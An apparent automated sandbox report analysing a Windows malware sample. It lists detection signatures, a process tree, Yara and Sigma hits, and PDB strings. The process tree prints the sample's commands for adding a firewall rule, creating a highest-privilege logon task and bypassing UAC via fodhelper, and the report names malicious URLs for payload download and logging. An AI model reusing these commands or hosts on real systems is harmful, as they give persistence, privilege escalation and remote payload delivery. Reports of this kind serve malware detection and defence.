Loading ...

Play interactive tourEdit tour

Windows Analysis Report 1dyvctHqv1

Overview

General Information

Sample Name:1dyvctHqv1 (renamed file extension from none to exe)
Analysis ID:520213
MD5:430e6667d7609792f43ef40150050e19
SHA1:a2766c9bc772d3e5970ad00d25ddd460dfc9322c
SHA256:1e227b989a219d8a1ba81633a8ff218e1acd87ec718382c0cb3ce5166d3f8c00
Tags:32exe
Infos:

Most interesting Screenshot:

Detection

Metasploit
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Metasploit Payload
Detected unpacking (overwrites its own PE header)
Sigma detected: Schedule system process
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Multi AV Scanner detection for dropped file
Sigma detected: System File Execution Location Anomaly
Uses netsh to modify the Windows network and firewall settings
Found Tor onion address
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Creates files in the system32 config directory
May modify the system service descriptor table (often done to hook functions)
Performs DNS TXT record lookups
Drops executables to the windows directory (C:\Windows) and starts them
Uses schtasks.exe or at.exe to add and modify task schedules
Drops PE files with benign system names
Creates an autostart registry key pointing to binary in C:\Windows
Uses shutdown.exe to shutdown or reboot the system
Changes security center settings (notifications, updates, antivirus, firewall)
Machine Learning detection for dropped file
Modifies the windows firewall
Sigma detected: Bypass UAC via Fodhelper.exe
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Sample execution stops while process was sleeping (likely an evasion)
Downloads executable code via HTTP
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Sigma detected: Netsh Port or Application Allowed
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Creates files inside the system directory
PE file contains sections with non-standard names
Found potential string decryption / allocating functions
Found dropped PE file which has not been started or loaded
Enables debug privileges
Is looking for software installed on the system
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Contains capabilities to detect virtual machines
PE / OLE file has an invalid certificate
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Classification

Process Tree

  • System is w10x64
  • 1dyvctHqv1.exe (PID: 7008 cmdline: "C:\Users\user\Desktop\1dyvctHqv1.exe" MD5: 430E6667D7609792F43EF40150050E19)
    • 1dyvctHqv1.exe (PID: 5384 cmdline: C:\Users\user\Desktop\1dyvctHqv1.exe MD5: 430E6667D7609792F43EF40150050E19)
      • cmd.exe (PID: 6860 cmdline: C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • netsh.exe (PID: 6840 cmdline: netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes MD5: 98CC37BBF363A38834253E22C80A8F32)
      • csrss.exe (PID: 6644 cmdline: C:\Windows\rss\csrss.exe /301-301 MD5: 430E6667D7609792F43EF40150050E19)
        • schtasks.exe (PID: 5972 cmdline: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
          • conhost.exe (PID: 6160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 4860 cmdline: schtasks /delete /tn ScheduledUpdate /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
          • conhost.exe (PID: 5072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • mountvol.exe (PID: 6596 cmdline: mountvol B: /s MD5: 5C11B99E6D41403031CD946255E8A353)
          • conhost.exe (PID: 6740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • mountvol.exe (PID: 5956 cmdline: mountvol B: /d MD5: 5C11B99E6D41403031CD946255E8A353)
          • conhost.exe (PID: 4036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • mountvol.exe (PID: 2976 cmdline: mountvol B: /s MD5: 5C11B99E6D41403031CD946255E8A353)
          • conhost.exe (PID: 6276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • mountvol.exe (PID: 4932 cmdline: mountvol B: /d MD5: 5C11B99E6D41403031CD946255E8A353)
          • conhost.exe (PID: 1580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • shutdown.exe (PID: 7128 cmdline: shutdown -r -t 5 MD5: E2EB9CC0FE26E28406FB6F82F8E81B26)
          • conhost.exe (PID: 6500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • WerFault.exe (PID: 7132 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5384 -s 996 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 7140 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3324 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6232 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6228 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4848 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • cmd.exe (PID: 4936 cmdline: C:\Windows\Sysnative\cmd.exe /C fodhelper MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 3836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • fodhelper.exe (PID: 6648 cmdline: fodhelper MD5: 1D1F9E564472A9698F1BE3F9FEB9864B)
      • fodhelper.exe (PID: 6408 cmdline: "C:\Windows\system32\fodhelper.exe" MD5: 1D1F9E564472A9698F1BE3F9FEB9864B)
      • fodhelper.exe (PID: 3336 cmdline: "C:\Windows\system32\fodhelper.exe" MD5: 1D1F9E564472A9698F1BE3F9FEB9864B)
        • csrss.exe (PID: 6880 cmdline: "C:\Windows\rss\csrss.exe" MD5: 430E6667D7609792F43EF40150050E19)
  • SgrmBroker.exe (PID: 5728 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • TrustedInstaller.exe (PID: 3108 cmdline: C:\Windows\servicing\TrustedInstaller.exe MD5: 4578046C54A954C917BB393B70BA0AEB)
  • svchost.exe (PID: 1744 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4816 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6820 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • WerFault.exe (PID: 7116 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 5384 -ip 5384 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 5128 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • csrss.exe (PID: 2268 cmdline: C:\Windows\rss\csrss.exe MD5: 430E6667D7609792F43EF40150050E19)
    • csrss.exe (PID: 6860 cmdline: C:\Windows\rss\csrss.exe MD5: 430E6667D7609792F43EF40150050E19)
  • csrss.exe (PID: 4848 cmdline: "C:\Windows\rss\csrss.exe" MD5: 430E6667D7609792F43EF40150050E19)
  • csrss.exe (PID: 6708 cmdline: "C:\Windows\rss\csrss.exe" MD5: 430E6667D7609792F43EF40150050E19)
    • cmd.exe (PID: 7044 cmdline: C:\Windows\Sysnative\cmd.exe /C fodhelper MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 5880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000032.00000003.433190112.000000000638A000.00000004.00000001.sdmpJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
    00000000.00000003.288501264.0000000005C6A000.00000004.00000001.sdmpJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
      0000000C.00000003.308140733.0000000005E2A000.00000004.00000001.sdmpJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
        00000027.00000003.375600027.000000000638A000.00000004.00000001.sdmpJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
          00000021.00000003.363027813.000000000638A000.00000004.00000001.sdmpJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
            Click to see the 19 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            52.2.csrss.exe.9ab080.2.raw.unpackMAL_ME_RawDisk_Agent_Jan20_2Detects suspicious malware using ElRawDiskFlorian Roth
            • 0x3eb18:$s2: The Magic Word!
            • 0x4ac58:$s2: The Magic Word!
            • 0x3ee78:$s3: Software\Oracle\VirtualBox
            • 0x3eb07:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
            31.2.csrss.exe.9ab080.2.raw.unpackMAL_ME_RawDisk_Agent_Jan20_2Detects suspicious malware using ElRawDiskFlorian Roth
            • 0x3eb18:$s2: The Magic Word!
            • 0x4ac58:$s2: The Magic Word!
            • 0x3ee78:$s3: Software\Oracle\VirtualBox
            • 0x3eb07:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
            52.3.csrss.exe.655bce0.1.raw.unpackMAL_ME_RawDisk_Agent_Jan20_2Detects suspicious malware using ElRawDiskFlorian Roth
            • 0x3c8b8:$s2: The Magic Word!
            • 0x489f8:$s2: The Magic Word!
            • 0x3cc18:$s3: Software\Oracle\VirtualBox
            • 0x3c8a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
            50.2.csrss.exe.5ca4f30.9.raw.unpackMAL_ME_RawDisk_Agent_Jan20_2Detects suspicious malware using ElRawDiskFlorian Roth
            • 0x444b8:$s2: The Magic Word!
            • 0x505f8:$s2: The Magic Word!
            • 0x44818:$s3: Software\Oracle\VirtualBox
            • 0x444a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
            52.3.csrss.exe.65540e0.3.raw.unpackMAL_ME_RawDisk_Agent_Jan20_2Detects suspicious malware using ElRawDiskFlorian Roth
            • 0x444b8:$s2: The Magic Word!
            • 0x505f8:$s2: The Magic Word!
            • 0x44818:$s3: Software\Oracle\VirtualBox
            • 0x444a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
            Click to see the 99 entries

            Sigma Overview

            System Summary:

            barindex
            Sigma detected: System File Execution Location AnomalyShow sources
            Source: Process startedAuthor: Florian Roth, Patrick Bareiss, Anton Kutepov, oscd.community: Data: Command: C:\Windows\rss\csrss.exe /301-301, CommandLine: C:\Windows\rss\csrss.exe /301-301, CommandLine|base64offset|contains: }5}5, Image: C:\Windows\rss\csrss.exe, NewProcessName: C:\Windows\rss\csrss.exe, OriginalFileName: C:\Windows\rss\csrss.exe, ParentCommandLine: C:\Users\user\Desktop\1dyvctHqv1.exe, ParentImage: C:\Users\user\Desktop\1dyvctHqv1.exe, ParentProcessId: 5384, ProcessCommandLine: C:\Windows\rss\csrss.exe /301-301, ProcessId: 6644
            Sigma detected: Bypass UAC via Fodhelper.exeShow sources
            Source: Process startedAuthor: E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community: Data: Command: "C:\Windows\rss\csrss.exe" , CommandLine: "C:\Windows\rss\csrss.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\rss\csrss.exe, NewProcessName: C:\Windows\rss\csrss.exe, OriginalFileName: C:\Windows\rss\csrss.exe, ParentCommandLine: "C:\Windows\system32\fodhelper.exe" , ParentImage: C:\Windows\System32\fodhelper.exe, ParentProcessId: 3336, ProcessCommandLine: "C:\Windows\rss\csrss.exe" , ProcessId: 6880
            Sigma detected: Netsh Port or Application AllowedShow sources
            Source: Process startedAuthor: Markus Neis, Sander Wiebing: Data: Command: netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes, CommandLine: netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes, CommandLine|base64offset|contains: l, Image: C:\Windows\System32\netsh.exe, NewProcessName: C:\Windows\System32\netsh.exe, OriginalFileName: C:\Windows\System32\netsh.exe, ParentCommandLine: C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6860, ProcessCommandLine: netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes, ProcessId: 6840
            Sigma detected: Windows Processes Suspicious Parent DirectoryShow sources
            Source: Process startedAuthor: vburov: Data: Command: C:\Windows\rss\csrss.exe /301-301, CommandLine: C:\Windows\rss\csrss.exe /301-301, CommandLine|base64offset|contains: }5}5, Image: C:\Windows\rss\csrss.exe, NewProcessName: C:\Windows\rss\csrss.exe, OriginalFileName: C:\Windows\rss\csrss.exe, ParentCommandLine: C:\Users\user\Desktop\1dyvctHqv1.exe, ParentImage: C:\Users\user\Desktop\1dyvctHqv1.exe, ParentProcessId: 5384, ProcessCommandLine: C:\Windows\rss\csrss.exe /301-301, ProcessId: 6644

            Persistence and Installation Behavior:

            barindex
            Sigma detected: Schedule system processShow sources
            Source: Process startedAuthor: Joe Security: Data: Command: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F, CommandLine: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F, CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: C:\Windows\rss\csrss.exe /301-301, ParentImage: C:\Windows\rss\csrss.exe, ParentProcessId: 6644, ProcessCommandLine: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F, ProcessId: 5972

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Antivirus detection for URL or domainShow sources
            Source: http://newscommer.com/app/app.exeURL Reputation: Label: malware
            Source: https://runmodes.com/api/logAvira URL Cloud: Label: malware
            Source: https://runmodes.com/api/log3633e481-2f88-4842-b7ba-c5d7e0cc011f.uuid.trumops.comAvira URL Cloud: Label: malware
            Antivirus detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeAvira: detection malicious, Label: TR/Agent.twerk
            Source: C:\Windows\windefender.exeAvira: detection malicious, Label: TR/Crypt.XPACK.eocey
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dllAvira: detection malicious, Label: TR/Redcap.gsjan
            Multi AV Scanner detection for submitted fileShow sources
            Source: 1dyvctHqv1.exeVirustotal: Detection: 19%Perma Link
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dllMetadefender: Detection: 45%Perma Link
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dllReversingLabs: Detection: 59%
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeMetadefender: Detection: 13%Perma Link
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeReversingLabs: Detection: 73%
            Source: C:\Windows\rss\csrss.exeReversingLabs: Detection: 25%
            Source: C:\Windows\windefender.exeMetadefender: Detection: 28%Perma Link
            Source: C:\Windows\windefender.exeReversingLabs: Detection: 78%
            Machine Learning detection for sampleShow sources
            Source: 1dyvctHqv1.exeJoe Sandbox ML: detected
            Machine Learning detection for dropped fileShow sources
            Source: C:\Windows\rss\csrss.exeJoe Sandbox ML: detected
            Source: 17.2.csrss.exe.16c3a000.17.unpackAvira: Label: TR/Patched.Ren.Gen
            Source: 17.2.csrss.exe.16bba000.16.unpackAvira: Label: TR/Patched.Ren.Gen

            Compliance:

            barindex
            Detected unpacking (overwrites its own PE header)Show sources
            Source: C:\Users\user\Desktop\1dyvctHqv1.exeUnpacked PE file: 0.2.1dyvctHqv1.exe.400000.1.unpack
            Source: C:\Users\user\Desktop\1dyvctHqv1.exeUnpacked PE file: 12.2.1dyvctHqv1.exe.400000.2.unpack
            Source: C:\Windows\rss\csrss.exeUnpacked PE file: 17.2.csrss.exe.400000.3.unpack
            Source: C:\Windows\rss\csrss.exeUnpacked PE file: 31.2.csrss.exe.400000.1.unpack
            Source: C:\Windows\rss\csrss.exeUnpacked PE file: 33.2.csrss.exe.400000.2.unpack
            Source: C:\Windows\rss\csrss.exeUnpacked PE file: 39.2.csrss.exe.400000.0.unpack
            Source: C:\Windows\rss\csrss.exeUnpacked PE file: 50.2.csrss.exe.400000.2.unpack
            Source: C:\Windows\rss\csrss.exeUnpacked PE file: 52.2.csrss.exe.400000.3.unpack
            Source: C:\Windows\rss\csrss.exeUnpacked PE file: 52.2.csrss.exe.400000.3.unpack
            Source: 1dyvctHqv1.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: C:\Users\user\Desktop\1dyvctHqv1.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
            Source: Binary string: Loader.pdb source: 1dyvctHqv1.exe, 00000000.00000003.288501264.0000000005C6A000.00000004.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000003.308140733.0000000005E2A000.00000004.00000001.sdmp, csrss.exe, 00000011.00000003.333882366.000000000638A000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.404110892.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000021.00000002.416342810.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: EfiGuardDxe.pdb7 source: csrss.exe
            Source: Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
            Source: Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
            Source: Binary string: Age does not matchThe module age and .pdb age do not match. source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
            Source: Binary string: symsrv.pdb source: csrss.exe
            Source: Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\mac\Desktop\driver-process-monitor\x64\Release\WinmonProcessMonitor.pdb source: 1dyvctHqv1.exe, 00000000.00000003.288501264.0000000005C6A000.00000004.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000003.308140733.0000000005E2A000.00000004.00000001.sdmp, csrss.exe, 00000011.00000003.333882366.000000000638A000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.404110892.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000021.00000002.416342810.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: Downloading symbols for [%s] %ssrv*symsrv*http://https://_bad_pdb_file.pdb source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
            Source: Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win7x64\x64\Release\SSDTHook.pdb source: 1dyvctHqv1.exe, 00000000.00000003.288501264.0000000005C6A000.00000004.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000003.308140733.0000000005E2A000.00000004.00000001.sdmp, csrss.exe, 00000011.00000003.333882366.000000000638A000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.404110892.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000021.00000002.416342810.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
            Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\Release\Winmon.pdb source: 1dyvctHqv1.exe, 00000000.00000003.288501264.0000000005C6A000.00000004.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000003.308140733.0000000005E2A000.00000004.00000001.sdmp, csrss.exe, 00000011.00000003.333882366.000000000638A000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.404110892.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000021.00000002.416342810.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: C:\vbox\branch\w64-1.6\out\win.amd64\release\obj\src\VBox\HostDrivers\VBoxDrv\VBoxDrv.pdb source: 1dyvctHqv1.exe, 00000000.00000003.288501264.0000000005C6A000.00000004.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000003.308140733.0000000005E2A000.00000004.00000001.sdmp, csrss.exe, 00000011.00000003.333882366.000000000638A000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.404110892.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000021.00000002.416342810.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: Drive not readyThis error indicates a .pdb file related failure. source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
            Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\x64\Release\Winmon.pdb source: 1dyvctHqv1.exe, 00000000.00000003.288501264.0000000005C6A000.00000004.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000003.308140733.0000000005E2A000.00000004.00000001.sdmp, csrss.exe, 00000011.00000003.333882366.000000000638A000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.404110892.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000021.00000002.416342810.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: Error while loading symbolsUnable to locate the .pdb file in any of the symbol search source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
            Source: Binary string: zzz_AsmCodeRange_*FrameDatainvalid string positionstring too long.pdb source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\vladimir\source\repos\driver-process-monitor\Release\WinmonProcessMonitor.pdb source: 1dyvctHqv1.exe, 00000000.00000003.288501264.0000000005C6A000.00000004.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000003.308140733.0000000005E2A000.00000004.00000001.sdmp, csrss.exe, 00000011.00000003.333882366.000000000638A000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.404110892.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000021.00000002.416342810.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp
